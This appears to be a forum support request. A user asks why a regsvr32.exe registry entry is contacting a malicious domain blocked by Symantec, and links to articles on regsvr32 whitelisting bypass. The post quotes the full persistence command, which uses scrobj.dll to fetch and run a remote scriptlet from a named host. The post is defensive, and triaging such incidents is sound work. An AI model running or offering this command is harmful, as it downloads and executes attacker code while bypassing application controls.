Hello Brian,
Thanks for the response. I submitted the sample and as per Symantec, the file regsvr32.exe is clean. I went through many articles online(https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-regsvr32-exe/)(https://labs.mwrinfosecurity.com/blog/dll-tricks-with-vba-to-improve-offensive-macro-capability/) and found that there is some registry entry created in the system by which regsvr32 tries to register a dll and then attempts to connect to a malicious URL which is blocked by SEP.
The registry entry created is regsvr32.exe /s /n /u http://server2.aserdefa.ru/restore.xml scrobj.dll.
I want analysis and clue from where this entry got created in registry and why only scrobj.dll was selected by regsvr32.exe to connect to the malicious domain.
Can you help please.
Thanks,